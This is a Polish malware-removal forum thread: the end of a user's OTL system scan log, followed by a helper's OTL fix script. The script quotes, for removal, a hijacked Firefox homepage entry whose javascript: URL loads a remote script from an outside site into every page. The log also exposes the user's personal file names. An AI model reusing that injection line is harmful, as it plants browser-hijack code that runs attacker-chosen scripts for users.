HKCU\..\Toolbar\WebBrowser: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software) O4 - HKLM..\Run: [MSConfig] C:\Windows\System32\msconfig.exe (Microsoft Corporation) O4 - HKLM..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe (Simply Super Software) O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O8 - Extra context menu item: &Windows Live Search - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr (Google Inc.) O8 - Extra context menu item: Wyślij obraz do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm () O8 - Extra context menu item: Wyślij stronę do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O9 - Extra 'Tools' menuitem : Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) O9 - Extra Button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O9 - Extra 'Tools' menuitem : @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm () O13 - gopher Prefix: missing O16 - DPF: {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab (Shockwave ActiveX Control) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab (Java Plug-in 1.6.0_02) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1 O18 - Protocol\Handler\pure-go {4746C79A-2042-4332-8650-48966E44ABA8} - C:\Program Files\Common Files\Pure Networks Shared\puresp3.dll (Pure Networks, Inc.) O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation) O24 - Desktop WallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O24 - Desktop BackupWallPaper: C:\Users\Max\AppData\Roaming\Microsoft\Windows Photo Gallery\Tapeta z Galerii fotografii systemu Windows.jpg O31 - SafeBoot: AlternateShell - cmd-brontok.exe O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2006-09-18 23:43:36 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O32 - AutoRun File - [2011-07-18 13:58:14 | 000,000,059 | RHS- | M] () - D:\autorun.inf -- [ FAT ] O34 - HKLM BootExecute: (autocheck autochk *) - File not found O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2011-07-23 14:51:44 | 000,000,000 | ---D | C] -- C:\Program Files\Ad-Remover [2011-07-23 14:19:13 | 000,000,000 | ---D | C] -- C:\_OTL [2011-07-19 23:11:14 | 000,000,000 | ---D | C] -- C:\A [2011-07-18 16:13:02 | 000,000,000 | ---D | C] -- C:\Users\Max\Desktop\Photoshop cs3 [2011-07-18 16:11:29 | 000,000,000 | ---D | C] -- C:\Users\Max\Desktop\17.07.2011 [2011-07-18 10:37:19 | 000,000,000 | ---D | C] -- C:\rsit [2011-07-18 10:22:08 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Local\Adobe [2011-07-18 10:17:00 | 000,000,000 | ---D | C] -- C:\Muzyja [2011-07-15 21:23:31 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe [2011-07-15 21:23:31 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe [2011-07-15 21:23:31 | 000,212,480 | ---- | C] (SteelWerX) -- C:\Windows\SWXCACLS.exe [2011-07-15 21:23:31 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe [2011-07-15 21:23:22 | 000,000,000 | ---D | C] -- C:\Windows\ERDNT [2011-07-15 21:23:19 | 000,000,000 | --SD | C] -- C:\ComboFix [2011-07-15 21:23:15 | 000,000,000 | ---D | C] -- C:\Qoobox [2011-07-15 21:23:01 | 000,000,000 | --SD | C] -- C:\32788R22FWJFW [2011-07-15 21:16:11 | 000,000,000 | ---D | C] -- C:\Program Files\Trend Micro [2011-07-15 21:16:11 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HiJackThis [2011-07-15 21:13:47 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Safer Networking [2011-07-15 21:13:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safer Networking [2011-07-15 21:13:21 | 000,000,000 | ---D | C] -- C:\Program Files\Safer Networking [2011-07-15 21:00:17 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\AIMP [2011-07-15 20:59:19 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AIMP2 [2011-07-15 20:59:16 | 000,000,000 | ---D | C] -- C:\Program Files\AIMP2 [2011-07-15 20:38:47 | 000,000,000 | ---D | C] -- C:\Users\Max\Documents\Simply Super Software [2011-07-15 20:38:46 | 000,000,000 | ---D | C] -- C:\ProgramData\TEMP [2011-07-15 20:38:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover [2011-07-15 20:38:18 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ztvcabinet.dll [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\Program Files\Trojan Remover [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Simply Super Software [2011-07-15 20:38:17 | 000,000,000 | ---D | C] -- C:\ProgramData\Simply Super Software [2011-07-13 11:48:57 | 000,000,000 | ---D | C] -- C:\Windows\System32\Adobe [2011-07-12 14:30:10 | 014,415,008 | ---- | C] (Mozilla) -- C:\Users\Max\Desktop\Firefox Setup 5.0.1-[www.legalne.info].exe [2011-07-11 13:14:07 | 000,000,000 | ---D | C] -- C:\Program Files\DAEMON Tools Toolbar [2011-07-11 13:13:33 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\DAEMON Tools Lite [2011-07-11 13:13:33 | 000,000,000 | ---D | C] -- C:\ProgramData\DAEMON Tools Lite [2011-07-09 17:31:35 | 000,000,000 | ---D | C] -- C:\7' [2011-07-08 16:01:51 | 000,000,000 | ---D | C] -- C:\Program Files\RegCleaner [2011-07-08 14:36:31 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\avast! Free Antivirus [2011-07-08 14:36:30 | 000,019,544 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys [2011-07-08 14:36:29 | 000,309,848 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswSP.sys [2011-07-08 14:36:27 | 000,043,608 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys [2011-07-08 14:36:27 | 000,025,432 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswRdr.sys [2011-07-08 14:36:26 | 000,441,176 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys [2011-07-08 14:36:25 | 000,054,104 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys [2011-07-08 14:35:28 | 000,199,304 | ---- | C] (AVAST Software) -- C:\Windows\System32\aswBoot.exe [2011-07-08 14:35:28 | 000,040,112 | ---- | C] (AVAST Software) -- C:\Windows\avastSS.scr [2011-07-08 13:37:06 | 000,000,000 | ---D | C] -- C:\Dokument [2011-07-08 13:34:44 | 000,000,000 | ---D | C] -- C:\Zdjecia [2011-06-28 10:35:24 | 000,000,000 | ---D | C] -- C:\Users\Max\AppData\Roaming\Skype [2011-06-28 10:35:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Google [2011-06-28 10:34:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Skype [2011-06-25 22:56:47 | 000,000,000 | -H-D | C] -- C:\Users\Max\Desktop\.picasaoriginals [2008-11-10 13:50:10 | 000,167,936 | ---- | C] ( ) -- C:\Windows\System32\rsnp2uvc.dll [2008-11-10 13:50:10 | 000,053,248 | ---- | C] ( ) -- C:\Windows\System32\csnp2uvc.dll [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2011-07-23 15:04:20 | 000,000,428 | -H-- | M] () -- C:\Windows\tasks\User_Feed_Synchronization-{D9B30BB4-63C0-47D4-A444-A174F9308500}.job [2011-07-23 14:54:54 | 000,065,536 | ---- | M] () -- C:\Windows\System32\Ikeext.etl [2011-07-23 14:54:11 | 000,003,472 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 [2011-07-23 14:54:11 | 000,003,472 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 [2011-07-23 14:54:03 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2011-07-23 14:53:57 | 2137,440,256 | -HS- | M] () -- C:\hiberfil.sys [2011-07-23 14:53:13 | 000,012,372 | ---- | M] () -- C:\Windows\bthservsdp.dat [2011-07-23 14:51:45 | 000,001,686 | ---- | M] () -- C:\Users\Max\Desktop\AD-R.lnk [2011-07-23 14:30:05 | 000,000,264 | ---- | M] () -- C:\Windows\tasks\Sprawdź aktualizacje paska narzędzi Windows Live Toolbar.job [2011-07-22 22:18:39 | 000,000,351 | ---- | M] () -- C:\Users\Max\Desktop\Dokument.rtf [2011-07-22 14:09:35 | 000,056,320 | ---- | M] () -- C:\Users\Max\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2011-07-22 14:09:32 | 735,087,260 | ---- | M] () -- C:\Users\Max\Desktop\High School Musical.avi [2011-07-22 13:38:29 | 220,638,918 | ---- | M] () -- C:\Windows\MEMORY.DMP [2011-07-21 23:43:08 | 012,213,624 | ---- | M] () -- C:\Users\Max\Desktop\Katalog_Avon_11_2011.pdf [2011-07-21 23:16:55 | 000,067,921 | ---- | M] () -- C:\Users\Max\8d976bf0a5.jpg [2011-07-21 23:07:18 | 003,578,148 | ---- | M] () -- C:\Users\Max\Desktop\Nowator_i_Feniks-_Jak_moglas.mp3 [2011-07-21 23:05:35 | 003,309,850 | ---- | M] () -- C:\Users\Max\Desktop\Nowator_-_Latino_kobieta.mp3 [2011-07-21 23:04:35 | 003,244,231 | ---- | M] () -- C:\Users\Max\Desktop\Chiwas__Nowator_-_Szpilki_.MP3.mp3 [2011-07-21 23:04:33 | 007,084,306 | ---- | M] () -- C:\Users\Max\Desktop\teoer-_we__go_poczuj.mp3 [2011-07-21 23:02:08 | 003,333,674 | ---- | M] () -- C:\Users\Max\Desktop\Nowator_-_Lollipop__.mp3 [2011-07-21 13:42:38 | 733,636,608 | ---- | M] () -- C:\Users\Max\Desktop\Zbuntowana Księżniczka.btgigs-wc.avi [2011-07-20 23:40:33 | 000,124,741 | ---- | M] () -- C:\Users\Max\Desktop\dsc06248.jpg [2011-07-20 23:39:00 | 000,048,058 | ---- | M] () -- C:\Users\Max\Desktop\dsc06241.jpg [2011-07-20 23:39:00 | 000,047,894 | ---- | M] () -- C:\Users\Max\Desktop\dsc06247.jpg [2011-07-20 23:36:50 | 000,058,007 | ---- | M] () -- C:\Users\Max\Desktop\84146630.jpg [2011-07-18 10:16:33 | 000,535,568 | ---- | M] () -- C:\Windows\System32\perfh015.dat [2011-07-18 10:16:33 | 000,086,416 | ---- | M] () -- C:\Windows\System32\perfc015.dat [2011-07-18 10:16:32 | 000,610,142 | ---- | M] () -- C:\Windows\System32\perfh009.dat [2011-07-18 10:16:32 | 000,103,924 | ---- | M] () -- C:\Windows\System32\perfc009.dat [2011-07-18 10:02:58 | 000,147,456 | ---- | M] () -- C:\Users\Max\Desktop\catchme.exe [2011-07-17 21:40:32 | 000,073,728 | -H-- | M] () -- C:\Users\Max\Desktop\photothumb.db [2011-07-17 17:47:58 | 083,249,807 | ---- | M] () -- C:\Users\Max\Desktop\Disco_Polo_Mp3_16.06.2011_www.djoles.pl.rar [2011-07-17 17:42:26 | 057,380,242 | ---- | M] () -- C:\Users\Max\Desktop\Paczka_Disco-Polo_Mp3_(11.07.2011)_(www.DjOles.pl).rar [2011-07-15 21:16:30 | 000,002,533 | ---- | M] () -- C:\Users\Max\Desktop\HiJackThis.lnk [2011-07-15 21:00:05 | 000,000,770 | ---- | M] () -- C:\Users\Public\Desktop\AIMP2.lnk [2011-07-15 20:38:21 | 000,000,886 | ---- | M] () -- C:\Users\Public\Desktop\Trojan Remover.lnk [2011-07-13 15:46:42 | 000,000,271 | ---- | M] () -- C:\Users\Max\fix.reg [2011-07-13 15:46:42 | 000,000,271 | ---- | M] () -- C:\Users\Max\Desktop\fix.reg [2011-07-12 22:59:00 | 000,000,130 | ---- | M] () -- C:\Users\Max\Desktop\Add.url [2011-07-12 14:30:46 | 000,000,856 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2011-07-12 14:30:16 | 014,415,008 | ---- | M] (Mozilla) -- C:\Users\Max\Desktop\Firefox Setup 5.0.1-[www.legalne.info].exe [2011-07-11 15:39:33 | 005,279,948 | ---- | M] () -- C:\Users\Max\Desktop\Aga M. - Za późno na słowa (www.DjOles.pl).mp3 [2011-07-11 11:13:17 | 001,383,966 | ---- | M] () -- C:\Users\Max\Desktop\lakiery%20dzbanek%20lemax%20nowe%20kolory.jpg [2011-07-08 16:02:52 | 000,000,777 | ---- | M] () -- C:\Users\Max\Desktop\RegCleaner.lnk [2011-07-08 14:36:31 | 000,001,839 | ---- | M] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk [2011-07-08 14:36:25 | 000,002,577 | ---- | M] () -- C:\Windows\System32\config.nt [2011-07-08 14:18:03 | 000,025,269 | ---- | M] () -- C:\Windows\System32\PROCDB.INI [2011-07-08 14:18:01 | 000,000,380 | ---- | M] () -- C:\Windows\System32\IPSCtrl.INI [2011-07-04 13:43:53 | 000,040,112 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr [2011-07-04 13:43:51 | 000,199,304 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe [2011-07-04 13:36:43 | 000,441,176 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys [2011-07-04 13:36:32 | 000,309,848 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSP.sys [2011-07-04 13:35:23 | 000,043,608 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys [2011-07-04 13:32:32 | 000,025,432 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswRdr.sys [2011-07-04 13:32:20 | 000,054,104 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys [2011-07-04 13:32:12 | 000,019,544 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys [2011-06-27 20:05:54 | 000,000,590 | ---- | M] () -- C:\Windows\tasks\Norton Internet Security - Uruchom pełne skanowanie systemu - Max.job [2011-06-26 08:45:56 | 000,256,000 | ---- | M] () -- C:\Windows\PEV.exe [color=#E56717]========== Files Created - No Company Name ==========[/color] [2011-07-23 14:51:45 | 000,001,686 | ---- | C] () -- C:\Users\Max\Desktop\AD-R.lnk [2011-07-21 23:42:56 | 012,213,624 | ---- | C] () -- C:\Users\Max\Desktop\Katalog_Avon_11_2011.pdf [2011-07-21 23:17:36 | 000,067,921 | ---- | C] () -- C:\Users\Max\8d976bf0a5.jpg [2011-07-21 23:07:17 | 003,578,148 | ---- | C] () -- C:\Users\Max\Desktop\Nowator_i_Feniks-_Jak_moglas.mp3 [2011-07-21 23:05:34 | 003,309,850 | ---- | C] () -- C:\Users\Max\Desktop\Nowator_-_Latino_kobieta.mp3 [2011-07-21 23:04:35 | 003,244,231 | ---- | C] () -- C:\Users\Max\Desktop\Chiwas__Nowator_-_Szpilki_.MP3.mp3 [2011-07-21 23:04:33 | 007,084,306 | ---- | C] () -- C:\Users\Max\Desktop\teoer-_we__go_poczuj.mp3 [2011-07-21 23:02:07 | 003,333,674 | ---- | C] () -- C:\Users\Max\Desktop\Nowator_-_Lollipop__.mp3 [2011-07-20 23:39:34 | 000,048,058 | ---- | C] () -- C:\Users\Max\Desktop\dsc06241.jpg [2011-07-20 23:39:31 | 000,047,894 | ---- | C] () -- C:\Users\Max\Desktop\dsc06247.jpg [2011-07-20 23:39:10 | 000,124,741 | ---- | C] () -- C:\Users\Max\Desktop\dsc06248.jpg [2011-07-20 23:36:59 | 000,058,007 | ---- | C] () -- C:\Users\Max\Desktop\84146630.jpg [2011-07-20 22:30:13 | 000,000,351 | ---- | C] () -- C:\Users\Max\Desktop\Dokument.rtf [2011-07-18 16:11:25 | 051,147,301 | ---- | C] () -- C:\Users\Max\Desktop\Portable Adobe Photoshop Cs3 (10.0) PL.exe [2011-07-18 16:11:25 | 000,147,456 | ---- | C] () -- C:\Users\Max\Desktop\catchme.exe [2011-07-17 21:16:08 | 005,279,948 | ---- | C] () -- C:\Users\Max\Desktop\Aga M. - Za późno na słowa (www.DjOles.pl).mp3 [2011-07-17 17:47:54 | 083,249,807 | ---- | C] () -- C:\Users\Max\Desktop\Disco_Polo_Mp3_16.06.2011_www.djoles.pl.rar [2011-07-17 17:42:23 | 057,380,242 | ---- | C] () -- C:\Users\Max\Desktop\Paczka_Disco-Polo_Mp3_(11.07.2011)_(www.DjOles.pl).rar [2011-07-15 21:23:31 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe [2011-07-15 21:23:31 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe [2011-07-15 21:23:31 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe [2011-07-15 21:23:31 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe [2011-07-15 21:23:31 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe [2011-07-15 21:16:12 | 000,002,533 | ---- | C] () -- C:\Users\Max\Desktop\HiJackThis.lnk [2011-07-15 20:59:19 | 000,000,770 | ---- | C] () -- C:\Users\Public\Desktop\AIMP2.lnk [2011-07-15 20:38:21 | 000,000,886 | ---- | C] () -- C:\Users\Public\Desktop\Trojan Remover.lnk [2011-07-15 20:38:18 | 000,162,304 | ---- | C] () -- C:\Windows\System32\ztvunrar36.dll [2011-07-15 20:38:18 | 000,153,088 | ---- | C] () -- C:\Windows\System32\UNRAR3.dll [2011-07-15 20:38:18 | 000,077,312 | ---- | C] () -- C:\Windows\System32\ztvunace26.dll [2011-07-15 20:38:18 | 000,075,264 | ---- | C] () -- C:\Windows\System32\unacev2.dll [2011-07-14 22:23:48 | 735,087,260 | ---- | C] () -- C:\Users\Max\Desktop\High School Musical.avi [2011-07-14 22:03:58 | 328,523,530 | ---- | C] () -- C:\Users\Max\Desktop\Kopciuszek - Roztańczona Historia... dmx-acs.rmvb [2011-07-13 22:20:21 | 733,636,608 | ---- | C] () -- C:\Users\Max\Desktop\Zbuntowana Księżniczka.btgigs-wc.avi [2011-07-13 22:20:14 | 348,069,959 | ---- | C] () -- C:\Users\Max\Desktop\Czego pragnie dziewczyna Lektor PL.rmvb [2011-07-13 15:46:57 | 000,000,271 | ---- | C] () -- C:\Users\Max\Desktop\fix.reg [2011-07-13 15:45:52 | 000,000,271 | ---- | C] () -- C:\Users\Max\fix.reg [2011-07-12 22:59:00 | 000,000,130 | ---- | C] () -- C:\Users\Max\Desktop\Add.url [2011-07-12 14:30:46 | 000,000,868 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [2011-07-12 14:30:46 | 000,000,856 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2011-07-11 11:13:40 | 001,383,966 | ---- | C] () -- C:\Users\Max\Desktop\lakiery%20dzbanek%20lemax%20nowe%20kolory.jpg [2011-07-08 16:01:52 | 000,000,777 | ---- | C] () -- C:\Users\Max\Desktop\RegCleaner.lnk [2011-07-08 14:36:31 | 000,001,839 | ---- | C] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk [2011-06-26 12:28:22 | 2137,440,256 | -HS- | C] () -- C:\hiberfil.sys [2011-05-22 21:59:25 | 000,004,096 | -H-- | C] () -- C:\Users\Max\AppData\Local\keyfile3.drm [2011-03-29 07:52:33 | 000,000,634 | ---- | C] () -- C:\Windows\ODBC.INI [2011-01-23 22:28:13 | 000,192,512 | ---- | C] () -- C:\Windows\System32\srkey.exe [2009-03-17 17:05:25 | 000,025,773 | ---- | C] () -- C:\Users\Max\AppData\Roaming\UserTile.png [2008-11-11 10:57:59 | 000,056,320 | ---- | C] () -- C:\Users\Max\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2008-11-11 10:55:51 | 000,164,352 | ---- | C] () -- C:\Windows\System32\unrar.dll [2008-11-11 10:55:51 | 000,000,038 | ---- | C] () -- C:\Windows\avisplitter.ini [2008-11-10 22:02:05 | 000,535,568 | ---- | C] () -- C:\Windows\System32\perfh015.dat [2008-11-10 22:02:05 | 000,332,832 | ---- | C] () -- C:\Windows\System32\perfi015.dat [2008-11-10 22:02:05 | 000,086,416 | ---- | C] () -- C:\Windows\System32\perfc015.dat [2008-11-10 22:02:05 | 000,037,468 | ---- | C] () -- C:\Windows\System32\perfd015.dat [2008-11-10 14:08:09 | 002,115,816 | ---- | C] () -- C:\Windows\System32\NPSWF32.dll [2008-11-10 13:58:42 | 001,238,832 | ---- | C] () -- C:\Windows\System32\igmedkrn.dll [2008-11-10 13:58:42 | 000,249,856 | ---- | C] () -- C:\Windows\System32\igfxTMM.dll [2008-11-10 13:58:42 | 000,147,456 | ---- | C] () -- C:\Windows\System32\igfxCoIn_v1329.dll [2008-11-10 13:58:42 | 000,104,636 | ---- | C] () -- C:\Windows\System32\igmedcompkrn.dll [2008-11-10 13:50:11 | 000,015,497 | ---- | C] () -- C:\Windows\snp2uvc.ini [2008-11-10 13:50:10 | 009,598,080 | ---- | C] () -- C:\Windows\System32\drivers\snp2uvc.sys [2008-11-10 13:43:53 | 000,012,080 | ---- | C] () -- C:\Windows\System32\drivers\TPPWR32V.SYS [2008-11-10 13:33:23 | 000,012,372 | ---- | C] () -- C:\Windows\bthservsdp.dat [2007-07-27 08:37:40 | 000,025,269 | ---- | C] () -- C:\Windows\System32\PROCDB.INI [2007-07-27 08:37:29 | 000,000,380 | ---- | C] () -- C:\Windows\System32\IPSCtrl.INI [2007-05-24 22:51:58 | 000,016,896 | ---- | C] () -- C:\Windows\Eventclr.exe [2007-05-10 18:34:13 | 000,006,218 | ---- | C] () -- C:\Windows\System32\tp4table.dat [2007-03-29 13:42:38 | 000,389,120 | ---- | C] () -- C:\Windows\System32\btwhidcs.dll [2006-11-02 14:57:28 | 000,067,584 | --S- | C] () -- C:\Windows\bootstat.dat [2006-11-02 14:47:37 | 000,317,712 | ---- | C] () -- C:\Windows\System32\FNTCACHE.DAT [2006-11-02 14:35:32 | 000,005,632 | ---- | C] () -- C:\Windows\System32\sysprepMCE.dll [2006-11-02 12:33:01 | 000,610,142 | ---- | C] () -- C:\Windows\System32\perfh009.dat [2006-11-02 12:33:01 | 000,287,440 | ---- | C] () -- C:\Windows\System32\perfi009.dat [2006-11-02 12:33:01 | 000,103,924 | ---- | C] () -- C:\Windows\System32\perfc009.dat [2006-11-02 12:33:01 | 000,030,674 | ---- | C] () -- C:\Windows\System32\perfd009.dat [2006-11-02 12:23:21 | 000,215,943 | ---- | C] () -- C:\Windows\System32\dssec.dat [2006-11-02 10:58:30 | 000,043,131 | ---- | C] () -- C:\Windows\mib.bin [2006-11-02 10:19:00 | 000,000,741 | ---- | C] () -- C:\Windows\System32\NOISE.DAT [2006-11-02 09:40:29 | 000,013,750 | ---- | C] () -- C:\Windows\System32\pacerprf.ini [2006-11-02 09:25:31 | 000,673,088 | ---- | C] () -- C:\Windows\System32\mlang.dat [2006-11-02 09:22:43 | 000,099,999 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin [2006-11-02 09:22:43 | 000,018,271 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin [2003-04-08 11:40:22 | 000,005,679 | ---- | C] () -- C:\Windows\System32\OUTLPERF.INI [2001-11-14 14:56:00 | 001,802,240 | ---- | C] () -- C:\Windows\System32\lcppn21.dll [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 64 bytes -> C:\Users\Max\Desktop\Zbuntowana Księżniczka.btgigs-wc.avi:TOC.WMV @Alternate Data Stream - 64 bytes -> C:\Users\Max\Desktop\High School Musical.avi:TOC.WMV < End of report > [/log]
wirusolog komentarz 23 lipca 2011 komentarz 23 lipca 2011 [b]1.[/b] Uruchom OTL i w oknie [b]Własne opcje skanowania/Skrypt[/b] wklej następujący tekst: [code]:OTL O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {32099AAC-C132-4136-9E9A-4E364A424E17} - No CLSID value found. FF - prefs.js..extensions.enabledItems: DTToolbar@toolbarnet.com:1.1.4.0024 FF - prefs.js..browser.search.selectedEngine: "DAEMON Search" FF - prefs.js..browser.startup.homepage: "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script'script.id='stylujDodajObrazki';script.type='text/javascript';script.src='http://stylistki.pl/scripts/dodajObrazki. js?'+(new%20Date()).getTime();o.body.appendChild(script);}a(document);})();"); [/code] Kliknij w [b]Wykonaj skrypt[/b]. Pokaż raport.
Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!
Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.